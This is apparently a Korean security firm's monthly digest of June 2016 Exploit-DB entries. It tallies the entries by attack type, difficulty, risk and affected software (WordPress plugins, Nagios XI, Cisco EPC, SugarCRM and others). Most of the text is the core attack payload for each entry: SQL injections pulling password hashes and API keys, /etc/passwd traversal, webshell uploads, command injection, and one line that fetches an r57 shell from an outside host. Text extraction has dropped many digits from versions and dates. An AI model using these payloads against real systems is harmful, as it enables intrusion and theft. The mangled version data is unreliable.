EDB 분석보고서 (06.06) ~ Exploit-DB(http://exploit-db.com) 에공개된별로분류한정보입니다. 날짜 EDB 번호분류공격난이도공격위험도이름핵심공격코드대상프로그램대상환경 Code

분석내용정리 ( 작성 : 펜타시큐리티시스템보안성평가팀 ) EDB 분석보고서 (06.06) 06.06.0~06.06.30 Exploit-DB(http://exploit-db.com) 에공개된별로분류한정보입니다. 06 년 6 월은상반기 Exploit-DB 보고개수가가장많은달이었습니다. 그만큼공격의종류도다양게보고되었습니다. SQL, XSS 등의공격보고개수가가장많았지만새로운공격방법이나공격패턴의특이점은발견되지않았습니다. SQL 대부분은공격난이도및위험도가낮은들이다수였으며, 단순히이있는지확인을위한공격패턴들이었습니다. 그러나해당공격패턴이성공여이발견된프로그램들은추가적인공격이들어올수있으므로발견된페이지와파라미터를확인여시큐어코딩및소프트웨어업데이트가필수적으로요구됩니다. SQL 이외 PHP Code 이발견된개수가 3 위로보고되었습니다. PHP Code 은 SQL 에비해상대적으로위험도가낮은에속지만많은웹사이트가 PHP 로이루어져있어공격빈도가높은입니다. PHP Code 에노출되지않도록 fputs 와 fwrite 등 PHP 에서실제적으로사용되는함수와명령어는미리정의여서쓰는것이요구됩니다.. 별보고개수 보고개수 RFI Command 3 File Upload 3 LFI 4 4 Code 4 XSS 3 SQL 7 총합계 49 8 6 4 0 8 6 4 0 RFI 3 3 Command 별보고개수 4 4 4 File Upload LFI Code 3 XSS 7 SQL. 위험도별분류 위험도 보고개수 백분율 상 5 0.0% 44 89.80% 합계 49 00.00% 위험도별분류 5 상 44 3. 공격난이도별현황공격난이도 보고개수 백분율 상 4.08% 5 30.6% 3 65.3% 총합계 49 00.00% 공격난이도별현황 5 3 상 4. 주요소프트웨어별발생현황 소프트웨어이름 보고개수 5 Wordpress 4 Nagios 3 XuezhuLi FileSharing Kagao Cisco EPC 398 BigTree CMS Notilus Travel Solution Software SugarCRM Drale DBTableViewer Electroweb Viart MyLittleForum jbfilemanager Airia OPAC KpwinSQL Relay Ajax Manager Concrete5 Alibaba Clone BB Script rconfig ibilling Ultrabenosaurus ChatBoard Apache Tiki-Wiki CMS Liferay CE Vicidial Ktools Dokeos wwiki 총합계 49 주요소프트웨어별발생현황 5 4 3 Wordpress Nagios XuezhuLi FileSharing Kagao Cisco EPC 398 BigTree CMS Notilus Travel Solution Software SugarCRM Drale DBTableViewer

EDB 분석보고서 (06.06) 06.06.0~06.06.30 Exploit-DB(http://exploit-db.com) 에공개된별로분류한정보입니다. 날짜 EDB 번호분류공격난이도공격위험도이름핵심공격코드대상프로그램대상환경 06-06-0 39876 Code.0.3. - index.php Remote Command Execution POST /%0.0.3./ajaxexplorer/index.php HTTP/..0.3. strpage=control/file/editor&strpath=p:/&strfile=terminal.php&strtext =<?php exec($_get["cmd"]);?> 06-06-0 39876 XSS.0.3. - index.php XSS POST /%0.0.3./ajaxexplorer/index.php HTTP/..0.3. strpage=control/file/editor&strpath=p:/&strfile=terminal.php&strtext =<script>alert(666)</script> 06-06-0 3988 File Upload POST / HTTP/. Connection: CloseAccept: text/html, application/xhtml+xml, */* Accept-Language: ko-kr User-Agent: Mozilla/5.0 (compatible; MSIE 0.0; Windows NT 6.; WOW64; Trident/6.0) Relay Ajax Manager Content-Type: multipart/form-data; boundary=--------------------------- relayb0-07706,.5.,.5.3-7dd009908f / File Upload -----------------------------7dd009908f Content-Disposition: form-data; name="file"; filename="info.php" Content-Type: application/octet-stream Relay Ajax Manager Relay Ajax Manager relayb0-07706,.5.,.5.3 <? phpinfo();?> -----------------------------7dd009908f-- 06-06-0 39880 XSS Liferay CE < 6. CE GA6 - /liferay/web/guest/ XSS POST /liferay/web/guest/home?p_p_id=58&p_p_lifecycle=&p_p_state= maximized&p_p_mode=view&_58_struts_action=%flogin%fcreat e_account HTTP/. Liferay CE Liferay CE < 6. CE GA6 _58_firstName=%%3E%3Cscript%3Ealert%8%7xss%7%9 %3C% 06-06-0 39879 SQL 상 SecurityCheck Extension.8.9 - index.php SQL /index.php?option='or(extractvalue(,concat(0x3a,(select(database()) ))))=' SecurityCheck Extension.8.9 06-06-06 39899 SQL 상 Nagios XI 5..7 - nagiosim.php SQL Injction /nagiosxi/includes/components/nagiosim/nagiosim.php?mode=resolv e&host=a&service='+and+(select++from(select+count(*),co NCAT(' APIKEY ',(SELECT+MID((IFNULL(CAST(backend_ticket+AS+CH AR),0x0)),,54)+FROM+xi_users+WHERE+user_id%3d+LIMIT+0,), ' APIKEY ',FLOOR(RAND(0)*))x+FROM+INFORMATION_SCHEMA.CH ARACTER_SETS+GROUP+BY+x)a)+OR+' Nagios Nagios XI 5..7

EDB 분석보고서 (06.06) 06.06.0~06.06.30 Exploit-DB(http://exploit-db.com) 에공개된별로분류한정보입니다. 날짜 EDB 번호분류공격난이도공격위험도이름핵심공격코드대상프로그램대상환경 06-06-06 39898 LFI rconfig 3.. - downloadfile.php LFI /lib/crud/downloadfile.php?download_file=/etc/passwd rconfig rconfig 3.. 06-06-06 39897 SQL 상상 Notilus Travel Solution Software 0 R3 - Password.aspx SQL POST /company/profilv4/password.aspx HTTP/. ACTION=&H_OLD=mypass'%3bdeclare%0@q%0varchar(99)%3 bset%0@q%3d'\\\\testdomain.mydo'%b'main.com\\vps'% 3b%0exec%0master.dbo.xp_dirtree%0@q%3b-- %0&H_NEW=%7+or+%7%7%3D%7&H_NEW=%7+or+ %7%7%3D%7 Notilus Travel Solution Travel Solution S Software 0 R 06-06-06 39896 SQL 상 Double Opt-In for Download Plugin.0.9 - admin-ajax.php SQL POST /wp-admin/adminajax.php?action=populate_download_edit_form HTTP/. Wordpress Double Opt- In for Download Plugin.0. id=0 UNION SELECT,, 4, 5, 6, 7, user_pass FROM wp_users WHERE ID= 06-06-06 3989 RFI WP Mobile Detector /wp-content/plugins/wp-mobiledetector/resize.php?src=http://www.test.com/index.php Plugin 3.5 - resize.php RFI Wordpress WP Mobile Detector Plugin 3.5 06-06-06 39890 SQL Electroweb Online Examination System.0 - showtest.php SQL /showtest.php?subid=%0and%0=-- Electroweb Electroweb Online Examination System.0 06-06-06 39899 Command Nagios XI 5..7 - nagiosim.php Command /nagiosxi/includes/components/nagiosim/nagiosim.php?mode=update& token=<apitoken>&incident_id=<valid incident id>&title=title'; touch /tmp/file; echo&status= Nagios Nagios XI 5..7 06-06-06 39899 Command Nagios XI 5..7 - graphapi.php Command /nagiosxi/includes/components/perfdata/graphapi.php?host=<any monitoredhost IP>&start=&end=; touch /tmp/file; Nagios Nagios XI 5..7

EDB 분석보고서 (06.06) 06.06.0~06.06.30 Exploit-DB(http://exploit-db.com) 에공개된별로분류한정보입니다. 날짜 EDB 번호분류공격난이도공격위험도이름핵심공격코드대상프로그램대상환경 06-06-06 39886 XSS /continuum/security/useredit_confirmadminpassword.action?userad minpassword=&username=guest&user.username=guest<script>alert( document.cookie)</script>&user.fullname=guest&user.email=blah@p rocheckup.com&user.password=password&user.confirmpassword=pa ssword&user.timestampaccountcreation=&user.timestamplastlogin =&user.timestamplastpasswordchange=&user.locked=false&user.pas swordchangerequired=false&method:confirmadminpassword=subm Apache Continuum.4. - it&cancel=cancel<http://7.0.0.:8080/continuum/security/useredit useredit_confirmadminpasswo _confirmadminpassword.action?useradminpassword=&username=g rd.action XSS uest&user.username=guest%3cscript%3ealert(document.cookie)%3 c/script%3e&user.fullname=guest&user.email=blah@procheckup.co m&user.password=password&user.confirmpassword=password&user. timestampaccountcreation=&user.timestamplastlogin=&user.timest amplastpasswordchange=&user.locked=false&user.passwordchange Required=false&method:confirmAdminPassword=Submit&cancel=Ca ncel> Apache Apache Continuum.4. 06-06-06 39883 LFI Simple Backup /wpadmin/tools.php?page=backup_manager&download_backup_file=ol Plugin.7. - tools.php LFI 취 약점 dbackups/../../../../../../etc/passwd Simple Backup Plugin.7. 06-06-07 39904 XSS POST /goform/administration HTTP/. Cisco EPC 398 - /goform/administration XSS 취 약점 Cisco EPC 398 Cisco EPC 398 working_mode=0&sysname=<script>alert('xss')</script>&syspasswd= home&sysconfirmpasswd=home&save=save+settings&preworkingm ode=&h_wlan_enable=enable&h_user_type=common 06-06-07 39904 XSS Cisco EPC 398 - /goform/wclientmaclist POST /goform/wclientmaclist HTTP/. Cisco EPC 398 Cisco EPC 398 sortwireless=mac&h_sortwireless=mac" onmouseover=alert() x="y 06-06-08 39905 SQL Drale DBTableViewer 003 - /vul_test/dbtableviewer/ SQL /vul_test/dbtableviewer/?orderby=nice_name%0rlike%0(select %0(CASE%0WHEN%0(697=697)%0THEN%00x6e6963655 f6e66d65%0else%00x8%0end))&sort=desc&sort=desc Drale DBTableView er Drale DBTableView er 00 06-06-3 39936 SQL PayPlans (com_payplans) Extension index.php?option=com_payplans&group_id=%0and%0=-- 3.3.6 - index.php SQL PayPlans (com_payplan s) Extension 3.3.6

EDB 분석보고서 (06.06) 06.06.0~06.06.30 Exploit-DB(http://exploit-db.com) 에공개된별로분류한정보입니다. 날짜 EDB 번호분류공격난이도공격위험도이름핵심공격코드대상프로그램대상환경 06-06-3 3993 File Upload Viart Shopping Cart 5.0 - admin_fm_upload_files.php File Upload POST /admin/admin_fm_upload_files.php HTTP/. Connection: CloseAccept: text/html, application/xhtml+xml, */* Accept-Language: ko-kr User-Agent: Mozilla/5.0 (compatible; MSIE 0.0; Windows NT 6.; WOW64; Trident/6.0) Content-Type: multipart/form-data; boundary=--------------------------- 7dd009908f -----------------------------7dd009908f Content-Disposition: form-data; name="newfile_0"; filename="shell.php" Content-Type: application/octet-stream Viart Viart Shopping Cart 5.0 <? phpinfo();?> -----------------------------7dd009908f-- 06-06-5 39956 jbfilemanager - jbfm.php /vul_test/jbfilemanager/jbfm/jbfm.php?act=open&path=/../../../../../.. /../../../etc/ jbfilemanage r jbfilemanage r 06-06-5 39955 XSS Booking System < 5.5 - eventlist.php XSS /scripts/booking/eventlist.php?serviceid=337%%0onmouseover =%alert() Booking System < 5.5 06-06-5 39953 SQL En Masse (com_enmasse) Component 5. - 6.4 - /component/enmasse/ SQL /component/enmasse/term?tmpl=component&id=%0and%0=- - En Masse (com_enmass e) Component 5. 06-06-5 3995 SQL Dokeos.. - slideshow.php SQL /dokeos-../main/document/slideshow.php?cidreq=3&curdirpath=%7 %0AND%0(SELECT%0*%0FROM%0(SELECT(SLEEP(5)))Pfag) %0AND%0%7NFwV%7=%7NFwV&slide_id=all Dokeos Dokeos.. 06-06-5 39955 SQL Booking System < 5.5 - eventlist.php SQL POST /ajax/checkchangeavailability.php HTTP/. Booking System < 5.5 id=' AND SLEEP(5) AND 'WAlE'='WAlE

EDB 분석보고서 (06.06) 06.06.0~06.06.30 Exploit-DB(http://exploit-db.com) 에공개된별로분류한정보입니다. 날짜 EDB 번호분류공격난이도공격위험도이름핵심공격코드대상프로그램대상환경 06-06-5 39950 XSS wwiki - index.php XSS POST /vul_test/wwiki/index.php HTTP/. wwiki wwiki page=xss&newtext=afsd%3cimg+src%3d%h%+onerror%3da lert%845%9%3eaa&action=save 06-06-5 39948 XSS Ultrabenosaurus ChatBoard - chat.php XSS POST /vul_test/chatboard/ original/chat.php HTTP/. Ultrabenosau rus ChatBoard Ultrabenosau rus ChatBoard msg=654<img src="z" onerror=zz>asd 06-06-6 39965 Code Tiki-Wiki CMS Calendar 4., /tikicalendar.php?viewmode=%7;%0$z=fopen%8%shell.php%,%7w Calendar 4., Tiki-Wiki CMS.5 LTS, 9. LTS, and 6.5 - Tiki-Wiki CMS tiki-calendar.php Code %7%9;fwrite%8$z,file_get_contents%8%http://hackersite.com/r57.5 LTS, 9..txt%%9%9;fclose%8$z%9;%7 LTS, and 6.5 06-06-7 39970 XSS Vicidial. - admin.php XSS POST / HTTP/. ADD=&DB=&script_id=tests&script_name=<script>alert('XSS!' </script>&script_comments=test& active=y&user_group=---all--- &selectedfield=fullname&script_text=<script>alert('xss!'</script>&submit=submit Vicidial Vicidial. 06-06-0 3998 File Upload Airia - editor.php File Upload POST /editor.php HTTP/. Connection: CloseAccept: text/html, application/xhtml+xml, */* Accept-Language: ko-kr User-Agent: Mozilla/5.0 (compatible; MSIE 0.0; Windows NT 6.; WOW64; Trident/6.0) Content-Type: multipart/form-data; boundary=--------------------------- 7dd009908f Airia Airia -----------------------------7dd009908f Content-Disposition: form-data; name="file"; filename="shell.php" Content-Type: application/octet-stream <?php echo 'Airia Webshell Exploit';#{shell};?> -----------------------------7dd009908f-- 06-06-0 39977 SQL BT Media /index.php?option=com_bt_media&view=list&categories[0]=%0an (com_bt_media) Component - d%0=--&itemid=34 index.php SQL BT Media (com_bt_med ia) Component

EDB 분석보고서 (06.06) 06.06.0~06.06.30 Exploit-DB(http://exploit-db.com) 에공개된별로분류한정보입니다. 날짜 EDB 번호분류공격난이도공격위험도이름핵심공격코드대상프로그램대상환경 POST /snews.7./?action=process&task=admin_article&id= HTTP/. AppleWebKit/535.7 06-06-0 39976 Command.7. - /snews.7./ KHTML, like Gecko Chrome/6.0.9.75 Command.7. text=[func]system: :"calc.exe"[/func] 06-06-0 39976 XSS.7. - /snews.7./ XSS POST /snews.7./?action=process&task=admin_article&id= HTTP/..7. text=[include]<script>alert(document.cookie)</script>[/include] 06-06- 39989 SQL Publisher Pro /index.php?option=com_publisher&view=issues&itemid=%0and% (com_publisher) Component - 0=--&lang=en index.php SQL Publisher Pro (com_publish er) Component 06-06-3 400 - api.php /vul_test//api.php?callback=jquery076857439986496 76_46666565&type=get&mode=0&folder=Li4vLi4vLi4vLi4vLi4v Li4vZXRjLw==&_=46666567 06-06-3 40009 XuezhuLi FileSharing - download.php /vul_test/filesharing/download.php?file_name=../../../../../../../../../../../../../etc/passwd XuezhuLi FileSharing XuezhuLi FileSharing 06-06-3 40006 LFI Alibaba Clone BB Script - show_page.php LFI /show_page.php?page=../configure.php%00 Alibaba Clone BB Script Alibaba Clone BB Script 06-06-3 400 XSS - api.php XSS /vul_test//api.php?callback=jquery0787465456 56_466665079}}c07%3Cscript%3Ealert%8%9%3C%fsc ript%3ecfea&type=get&mode=0&_=466665080

EDB 분석보고서 (06.06) 06.06.0~06.06.30 Exploit-DB(http://exploit-db.com) 에공개된별로분류한정보입니다. 날짜 EDB 번호분류공격난이도공격위험도이름핵심공격코드대상프로그램대상환경 06-06-3 40009 XuezhuLi FileSharing - /vul_test/filesharing/viewing.php?file_name=../../../../../../../../../../../. viewing.php./../etc/passwd XuezhuLi FileSharing XuezhuLi FileSharing 06-06-7 4004 SQL 상상 POST /site/index.php/admin/pages/update/ HTTP/. BigTree CMS 4.. - /site/index.php/admin/pages/u pdate/ SQL page=' and 6=3 or =+(SELECT and ROW(,)>(SELECT COUNT(*),CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(5),CHAR (00),CHAR(05),CHAR(08),CHAR(0),CHAR(09),CHAR(09),CHA R(97),0x3a,FLOOR(RAND(0)*))x FROM INFORMATION_SCHEMA.COLLATIONS GROUP BY x)a)+' BigTree CMS BigTree CMS 4.. POST /ibilling/index.php HTTP/. 06-06-7 400 XSS ibilling 3.7.0 - index.php XSS account=%%3e%3cscript%3ealert()%3c%fscript%3e&compa ny=%%3e%3cscript%3ealert()%3c%fscript%3e&email=test %40yahoo.com&phone=%%3E%3Cscript%3Ealert(4)%3C%Fsc ript%3e&address=%%3e%3cscript%3ealert(5)%3c%fscript%3 E&city=%%3E%3Cscript%3Ealert(6)%3C%Fscript%3E&state= %%3E%3Cscript%3Ealert(7)%3C%Fscript%3E&zip=%%3E %3Cscript%3Ealert(8)%3C%Fscript%3E&country=TR&tags%5B%5 D=web_development%%3E%3Cscript%3Ealert(9)%3C%Fscript %3E ibilling ibilling 3.7.0 06-06-7 400 Code MyLittleForum.3.5 - /install/index.php Code POST /install/index.php HTTP/. MyLittleForu m MyLittleForu m.3.5 database=';?><?php echo passthru('/bin/cat /etc/passwd');' 06-06-7 4009 SQL Kagao 3.0 - cat.php SQL /cat.php?id=999999.9%%0union%0all%0select%0concat %80x7e%C0x7%Cunhex%8Hex%8cast%8database%8% 9%0as%0char%9%9%9%C0x7%C0x7e%9--%0a Kagao Kagao 3.0 06-06-7 4007 Code SugarCRM 6.5.8 - index.php Code /index.php?module=connectors&action=runtest&source_id=ext_rest_in sideview&ext_rest_insideview_[%7.phpinfo().%7]= SugarCRM SugarCRM 6.5.8

EDB 분석보고서 (06.06) 06.06.0~06.06.30 Exploit-DB(http://exploit-db.com) 에공개된별로분류한정보입니다. 날짜 EDB 번호분류공격난이도공격위험도이름핵심공격코드대상프로그램대상환경 06-06-7 4009 XSS Kagao 3.0 - cat.php XSS /cat.php?id=0&pricestart=0&room=&flache=&price=&zulassung=& kilometer=&kraftstoff=&id3=0&suche=%%3e%3cscript%3ealert %8%7n4tural%7%9%3B%3C%Fscript%3E&id=0&sucheWo =&umkreis=0 Kagao Kagao 3.0 06-06-7 4003 SQL OPAC KpwinSQL - zaznam.php SQL /zaznam.php?detail_num=%0and%0=-- OPAC KpwinSQL OPAC KpwinSQL GET /concrete5/index.php HTTP/. 06-06-9 40045 LFI Concrete5 5.7.3. - index.php LFI X-Original-Url: /tools/../../index Connection: keep-alive Concrete5 Concrete5 5.7.3. 06-06-9 4004 SQL Ultimate Membership Pro Plugin 3.3 - admin-ajax.php SQL POST / HTTP/. action=ihc_preview_user_listing&shortcode=[ihc-list-users filter_by_level="" levels_in="[ihc-list-users filter_by_level="" levels_in="') union all select (SELECT CASE WHEN ($sql) then else *(select table_name from information_schema.tables) end)#" theme="ihc-theme_" theme="ihc-theme_ Wordpress Ultimate Membership Pro Plugin 3.3 06-06-30 40046 SQL POST / HTTP/. Ktools Photostore 4.7.5 - mgr.login.php SQL 취 약점 Ktools Ktools Photostore 4.7.5 email=%7%0and%0=--;#